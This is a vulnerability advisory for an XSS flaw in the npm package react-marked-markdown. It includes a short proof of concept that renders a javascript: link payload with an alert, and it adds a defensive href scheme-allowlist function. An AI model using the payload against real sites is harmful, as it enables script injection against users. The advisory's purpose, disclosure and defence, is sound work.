GHSA-m7qm-r2r5-f77q – react-marked-markdown
Package
Manager: npm
Name: react-marked-markdown
Vulnerable Version: >=0 <=1.4.6
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N/E:U/RL:O/RC:C
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
EPSS: N/A (percentile: N/A)
Details
Cross-Site Scripting in react-marked-markdown

All versions of `react-marked-markdown` are vulnerable to cross-site scripting (XSS) via `href` attributes. This is exploitable if user input is provided to `react-marked-markdown`.

Proof of concept:

```
import React from 'react'
import ReactDOM from 'react-dom'
import { MarkdownPreview } from 'react-marked-markdown'

// Even with marked's `sanitize` option enabled, the javascript: link
// destination is passed through into the rendered href.
ReactDOM.render(
  <MarkdownPreview
    markedOptions={{ sanitize: true }}
    value={'[XSS](javascript: alert`1`)'}
  />,
  document.getElementById('root')
)
```

## Recommendation

No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.
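As an added example (not code from the advisory or from `react-marked-markdown`), the kind of scheme allowlist a rendering layer should apply to every link destination before it becomes an `href`; the function names and the small entity-decoding subset are assumptions, and a production renderer would use a full HTML entity decoder.

```javascript
// Allowlist of link schemes a markdown renderer may emit as href.
// Anything without a scheme (relative path, query, fragment) is also accepted.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Browsers decode entities inside attribute values, so the check must see the
// same string the browser will: decode the numeric and named entities that can
// appear inside a scheme. (Subset only; assumed helper.)
function decodeEntities(s) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&colon;/gi, ":")
    .replace(/&tab;/gi, "\t")
    .replace(/&newline;/gi, "\n");
}

// Return true if rawHref may be emitted as an href attribute.
function isSafeHref(rawHref) {
  // Mirror the URL parser: trim leading/trailing C0 controls and spaces, and
  // drop ASCII tab/newline anywhere, before the scheme is recognised. This is
  // why the advisory's "javascript: alert`1`" is still live in a browser.
  const href = decodeEntities(String(rawHref))
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(href);
  if (!m) return true; // no scheme: relative URL
  return ALLOWED_SCHEMES.has(m[1].toLowerCase() + ":");
}

// Replace a rejected destination with an inert value instead of passing it on.
function safeHref(rawHref) {
  return isSafeHref(rawHref) ? rawHref : "#";
}
```

Hook a check like this into whatever produces the final `<a>` element; rejecting at render time is what marked's `sanitize` option does not do for this case.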
Metadata
Created: 2020-09-01T20:43:48Z
Modified: 2021-09-24T20:35:29Z
Source: MANUAL
CWE IDs: ["CWE-79"]
Alternative ID: N/A
Finding: F008
Auto approve: 1